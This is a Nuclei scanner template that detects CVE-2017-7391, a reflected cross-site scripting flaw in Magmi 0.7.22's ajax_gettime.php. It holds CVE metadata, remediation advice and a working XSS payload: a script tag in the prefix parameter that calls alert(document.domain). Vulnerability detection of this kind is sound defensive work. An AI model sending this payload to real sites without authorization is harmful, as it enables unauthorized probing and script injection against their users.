nuclei-templates/http/cves/2017/CVE-2017-7391.yaml

51 lines
1.7 KiB
YAML

id: CVE-2017-7391
info:
name: Magmi 0.7.22 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
remediation: |
Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://github.com/dweeves/magmi-git/issues/522
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
- https://github.com/dweeves/magmi-git/pull/525
- https://nvd.nist.gov/vuln/detail/CVE-2017-7391
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-7391
cwe-id: CWE-79
epss-score: 0.00204
epss-percentile: 0.58023
cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: magmi_project
product: magmi
tags: cve,cve2017,magmi,xss
http:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100f6843dd9d1815c7ee246fac7eaad5502626b54bb6981855b096b509a6efef1b8022100b4c214d3f05db77c09ba141bcb572ea67730175cbfd66445a416ea3e6dbb975e:922c64590222798bb761d5b6d8e72950